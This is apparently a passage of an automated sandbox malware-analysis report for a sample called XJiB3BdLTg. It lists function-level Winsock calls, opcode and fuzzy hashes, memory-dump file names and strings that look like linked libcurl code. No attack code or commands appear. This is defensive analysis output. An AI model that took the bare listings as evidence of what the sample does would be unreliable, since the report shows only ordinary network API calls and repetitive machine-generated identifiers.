                                          • Opcode Fuzzy Hash: dc9319bf54cc4c553702d74e2d57fc953377af40f12bf83a079890cff356d559
                                          • Instruction Fuzzy Hash: 9471A4B49043199FDB40DF69C98479EBBF0FF85308F10896DE89897311D7749A888F92

                                          Control-flow Graph (function entry 0x28aa30; API calls on the graph: socket, ioctlsocket, setsockopt, connect; the executed / not executed block colouring and the node/edge list are not reproduced here)
                                          APIs
                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0028AB9B
                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0028ABE4
                                          • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 0028AD20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: ioctlsocketsetsockoptsocket
                                          • String ID: ;m}
                                          • API String ID: 2067140946-697879304
                                          • Opcode ID: 6641b2833dbe50bb5e2fc92c9831eee19fff6417e8c4e84eee5f802020580bab
                                          • Instruction ID: d9cb4d0b73db79ac00c476e906ee6f142467c487dd4b7cd2fc459daedc9d8e5a
                                          • Opcode Fuzzy Hash: 6641b2833dbe50bb5e2fc92c9831eee19fff6417e8c4e84eee5f802020580bab
                                          • Instruction Fuzzy Hash: 0DE1E1746213029FEB20DF24C840B6A77A5FF85304F144A2EF9988B2D1EB75E964CB53

                                          Control-flow Graph (function entry 0x1f9290; API calls on the graph: WSAIoctl, setsockopt; the executed / not executed block colouring and the node/edge list are not reproduced here)
                                          APIs
                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 001F935C
                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 001F9389
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: Ioctlsetsockopt
                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                          • API String ID: 1903391676-2691795271
                                          • Opcode ID: f2c70a565b54c6ada69b307275533276fbb48eadf130ca1abc0cc404ce2967b6
                                          • Instruction ID: 798cfa5cbc80f42fd438dc22ff4002942fd0382c691e41fec3c01ffd0dc6ef6b
                                          • Opcode Fuzzy Hash: f2c70a565b54c6ada69b307275533276fbb48eadf130ca1abc0cc404ce2967b6
                                          • Instruction Fuzzy Hash: 5E510574A04309AFE714EF24C881FBAB7A5FF94714F148529FE488B282E731E951CB91

                                          Control-flow Graph (function entry 0x1c76a0; API call on the graph: send; the executed / not executed block colouring and the node/edge list are not reproduced here)
                                          APIs
                                          • send.WS2_32(multi.c,?,?,?,001C3D4E,00000000,?,?,001D07BF), ref: 001C76EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                          • API String ID: 2809346765-3388739168
                                          • Opcode ID: 6b076eb4a1f3e3c6352cc1d811fd140e7177f5dff9cf2224e4f7267090d44541
                                          • Instruction ID: 6b0c0dbdc32c6bae836ce11d61af2fd5459b868f4467ea544bd17e9a5465cc5a
                                          • Opcode Fuzzy Hash: 6b076eb4a1f3e3c6352cc1d811fd140e7177f5dff9cf2224e4f7267090d44541
                                          • Instruction Fuzzy Hash: B411ABF561D3547FE110AB549C8AF277B5CDBE2B68F45061CF80463282D795DC01C9B2

                                          Control-flow Graph (function entry 0x54d1d0; API call on the graph: localeconv; the executed / not executed block colouring and the node/edge list are not reproduced here)
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$Inf$NaN
                                          • API String ID: 0-141429178
                                          • Opcode ID: f13de62672542e07248f7d7a8f5b3a2b3abdb38862e67e84a235fb6968ee639a
                                          • Instruction ID: 3dbecaf39f97fa541daf5bf19d5fc61591c5cfc78c293d8c5a6c952deb907ac2
                                          • Instruction Fuzzy Hash: C7F1AC7160C3868BD7219F24C0907EABFF1BBC5318F158A2DE9DD87382D73599058B92

                                          Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: recv
                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                          • API String ID: 1507349165-640788491
                                          • Opcode ID: dea84c1c3b459275668c1f62b97fef37738eeb146b0976275dca72839b448e12
                                          • Instruction ID: 508d1f57b63f59bc453adb063518d232a32358d90a5a6ae53159a1c5a233d5a2
                                          • Instruction Fuzzy Hash: 9D11E7B56093187FD120AB649C4EF2B7B5CDBE6B68F55062CF84493282D7A1DC01C9B3

                                          Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                          • API String ID: 98920635-842387772
                                          • Opcode ID: b6ebbd1954016c312855005cadef5bcd52f7d8b6e83626d8ffce8d64b50e2d95
                                          • Instruction ID: d7bc35b120cf0d4a274e2821f2c3250801761fdf9d89515c1955ed5fd22031c9
                                          • Instruction Fuzzy Hash: B6114CB1A143213BE6216B68AC4AF9B3F58DFD2774F040A28F404D62D2D351CC55D6E1

                                          Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: _open
                                          • String ID: terminated$@
                                          • API String ID: 4183159743-3016906910
                                          • Opcode ID: 29f5350742f25d58c7d01ebc1c782817036abddd4674e804fd6392335c9a730b
                                          • Instruction ID: 5a29379b1f1b0c0231799361094c9d62fc9493eaf8e775da909770a7719d8e16
                                          • Instruction Fuzzy Hash: 45416CB09083059FDB10EF79C8846AEBBE5BB85318F10892DE898D7380EB35D805DB56
                                          APIs
                                          • getsockname.WS2_32(?,?,00000080), ref: 001FA1C7
                                          Strings
                                          • getsockname() failed with errno %d: %s, xrefs: 001FA1F0
                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 001FA23B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                          • API String ID: 3358416759-2605427207
                                          • Opcode ID: b61662d4d119729d7dbe763cb4f696021090575c9e11e1e41e8edd8e4933f589
                                          • Instruction ID: a74e12d7cf89a65102741b4e87e2f3702d142d940fc8bb0e316f73a844ffbc64
                                          • Instruction Fuzzy Hash: AB21D871948384AAE7259B18EC46FF773BCEFD1324F040614FA9853152FB32598586E2
                                          APIs
                                          • WSAStartup.WS2_32(00000202), ref: 001DD65B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: if_nametoindex$iphlpapi.dll
                                          • API String ID: 724789610-3097795196
                                          • Opcode ID: 2e474abb0adebb7a182ad6040b4be8c20f14dbb15f1949632d4171b6d2542550
                                          • Instruction ID: a5f4a5d9867400348dece15eedf515e8dce10b92737799bca2581c5c7d458eb7
                                          • Instruction Fuzzy Hash: 4B01FED0D543815AF751BB38BD1F7A636A05B51704F440579E888953D2FB7DC588C2D3
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseEvent
                                          • String ID: multi.c
                                          • API String ID: 2624557715-214371023
                                          • Opcode ID: 43fbdb41c74a65a314c38dc0492f204bb66e0de08c7c12d1ba9632873733089e
                                          • Instruction ID: 33f2858c1a40289ccbc9b23224f7f512f557f1379a024709a2dccc96f7c8c5c7
                                          • Instruction Fuzzy Hash: 425109B19043005BDB10AE309C42FA776A9AF71318F08443CF98D9A293FB75E51AC792
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: closesocket
                                          • String ID: FD %s:%d sclose(%d)
                                          • API String ID: 2781271927-3116021458
                                          • Opcode ID: 89123d13f7b509a0c882f884c84e2b4c0c2816b660c1338cbe2007f77c775104
                                          • Instruction ID: 40ec4aa7422fabb9a81d9eef540ffce86182e8e53bcd69beee7f4ce1847ae157
                                          • Opcode Fuzzy Hash: 89123d13f7b509a0c882f884c84e2b4c0c2816b660c1338cbe2007f77c775104
                                          • Instruction Fuzzy Hash: F8D05E729092212B8520A9996C49C8BABA8DED6F70B090D68F94067241E260DC0087E2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: Rz
                                          • API String ID: 2962429428-626314018
                                          • Opcode ID: dc87bf86a80fe738df03937eaaa4302b629745aefe32c18ce92b9694bb523df3
                                          • Instruction ID: b86c3857122c1130bdfefe1ffe71d99824dee0fb2404aae582fcc60e25d9eeae
                                          • Opcode Fuzzy Hash: dc87bf86a80fe738df03937eaaa4302b629745aefe32c18ce92b9694bb523df3
                                          • Instruction Fuzzy Hash: 1231C2B49093059FCB40EFB8C5896AEBBF5AF45344F10892DE898AB201E734DA44CF52
                                          APIs
                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0028B29E,?,00000000,?,?), ref: 0028B0BA
                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00273C41,00000000), ref: 0028B0C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: ErrorLastconnect
                                          • String ID:
                                          • API String ID: 374722065-0
                                          • Opcode ID: 09ddcce59ceaaae2d652bb77f5bde63d59a8a164e202e755c13a06dceff3934d
                                          • Instruction ID: 9d3a669236b105ab96a9b53f157c28ab1963e5fe31b95319df812ff11cf4a66d
                                          • Opcode Fuzzy Hash: 09ddcce59ceaaae2d652bb77f5bde63d59a8a164e202e755c13a06dceff3934d
                                          • Instruction Fuzzy Hash: 1B012D393253019BCA216E248C44E67B395FF49364F140718F978531E0D726ED204752
                                          APIs
                                          • gethostname.WS2_32(00000000,00000040), ref: 00274AA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: gethostname
                                          • String ID:
                                          • API String ID: 144339138-0
                                          • Opcode ID: 31b495ed8aa9d99e5b25fe1fb8011de54ceff3af4635d6f69bc4d9998bff0215
                                          • Instruction ID: 7ff9580c56561eefcc3dc35a0382291ce77939c53a7f8f55ddd89fdec06c5bd0
                                          • Opcode Fuzzy Hash: 31b495ed8aa9d99e5b25fe1fb8011de54ceff3af4635d6f69bc4d9998bff0215
                                          • Instruction Fuzzy Hash: 3451D070A243029BE730AF25DD4972776E4EF45318F14983DEA8E866D1E7B4EC64CB02
                                          APIs
                                          • getsockname.WS2_32(?,?,00000080), ref: 0028AFD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID:
                                          • API String ID: 3358416759-0
                                          • Opcode ID: 3505f8b82db2846daadcd6b5ed855c0039a1c5dc1a32c4e92ac48bd22d543697
                                          • Instruction ID: 327d91ea79ec1157c7c5e1f51c18bb0048edbe5ffdbd71f1a39793db12a8a835
                                          • Opcode Fuzzy Hash: 3505f8b82db2846daadcd6b5ed855c0039a1c5dc1a32c4e92ac48bd22d543697
                                          • Instruction Fuzzy Hash: C6119670818785A6FB268F18D4027F6B3F4EFD0329F109619E59942550FB725AD68BC2
                                          APIs
                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0028A97E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: 923869342c4ffe665603665ab60ec15b90521d1795b203416f077662db15567e
                                          • Instruction ID: 052050131712b653c46a5a77cca01a005b20e7a7d062e5aa85704471456896ab
                                          • Opcode Fuzzy Hash: 923869342c4ffe665603665ab60ec15b90521d1795b203416f077662db15567e
                                          • Instruction Fuzzy Hash: 6601DB757117109FD714DF14DC45B56B7A5EF84720F05855EF9942B3A1C331AC108BD1
                                          APIs
                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0027712E,?,?,?,00001001,00000000), ref: 0028A90C
                                          Memory Dump Source
